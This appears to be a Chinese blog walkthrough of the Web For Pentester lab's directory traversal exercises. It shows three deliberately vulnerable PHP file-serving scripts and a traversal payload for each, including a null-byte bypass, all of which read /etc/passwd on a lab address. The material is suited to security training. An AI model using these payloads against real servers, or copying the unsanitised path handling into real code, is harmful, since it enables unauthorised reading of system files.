zoukankan      html  css  js  c++  java
  • Web For Pentester1 -Directory traversal

    Example 1

    源码:

    <?php

    $UploadDir = '/var/www/files/';

    if (!(isset($_GET['file'])))
    die();


    $file = $_GET['file'];

    $path = $UploadDir . $file;

    if (!is_file($path))
    die();

    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Cache-Control: public');
    header('Content-Disposition: inline; filename="' . basename($path) . '";');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($path));

    $handle = fopen($path, 'rb');

    do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
    break;
    }
    echo($data);
    } while (true);

    fclose($handle);
    exit();


    ?>

    解释:默认以二进制显示头像hack.png,  $handle = fopen($path, 'rb')这里 path 变量没有进行任何过滤,导致可以通过../../../的形式造成目录穿越

    payload:

    http://10.10.202.152/dirtrav/example1.php?file=../../../etc/passwd

    Example 2

    源码:

    <?php


    if (!(isset($_GET['file'])))
    die();


    $file = $_GET['file'];

    if (!(strstr($file,"/var/www/files/")))
    die();

    if (!is_file($file))
    die();

    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Cache-Control: public');
    header('Content-Disposition: inline; filename="' . basename($file) . '";');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($file));

    $handle = fopen($file, 'rb');

    do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
    break;
    }
    echo($data);
    } while (true);

    fclose($handle);
    exit();


    ?>

    解释:这里检测了 file 参数必须含有 /var/www/files/,实际上并不影响我们使用 ../../进行目录穿越:

    payload:

    http://10.10.202.152/dirtrav/example2.php?file=/var/www/files/../../../etc/passwd

    Example 3

    源码:

    <?php
    $UploadDir = '/var/www/files/';

    if (!(isset($_GET['file'])))
    die();


    $file = $_GET['file'];

    $path = $UploadDir . $file.".png";
    // Simulate null-byte issue that used to be in filesystem related functions in PHP
    $path = preg_replace('/x00.*/',"",$path);

    if (!is_file($path))
    die();

    header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
    header('Cache-Control: public');
    header('Content-Disposition: inline; filename="' . basename($path) . '";');
    header('Content-Transfer-Encoding: binary');
    header('Content-Length: ' . filesize($path));

    $handle = fopen($path, 'rb');

    do {
    $data = fread($handle, 8192);
    if (strlen($data) == 0) {
    break;
    }
    echo($data);
    } while (true);

    fclose($handle);
    exit();


    ?>

    解释:

    $path = $UploadDir . $file.".png"; 限制了读取的文件名为后缀是Png的类型,但是可以通过 00 截断来 Bypass PHP <= 5.3.4 版本,且魔术引号处于关闭状态的时候可以 00 截断成功。

    $path = preg_replace('/x00.*/',"",$path); 正则表达式,x00.* 后面的都替换为空,刚好,%00.png 就可以全部替换掉了

    payload:

    http://10.10.202.152/dirtrav/example3.php?file=../../../../../etc/passwd%00

    OVER!

  • 相关阅读:
    数组过滤
    数组过滤
    以文件流的形式下载文件
    antD 时间年的写法
    如何判断一个js对象是否是Array,
    webSocket 使用
    react map循环的dom,点击让当前数组里的isShow显示false
    react react-draft-wysiwyg使用
    jQuery placeholder插件 让IE也能够支持placeholder属性
    JavaScript 逼真图片倒计时实现代码 js时间图片倒计时
  • 原文地址:https://www.cnblogs.com/hack404/p/13192007.html
Copyright © 2011-2022 走看看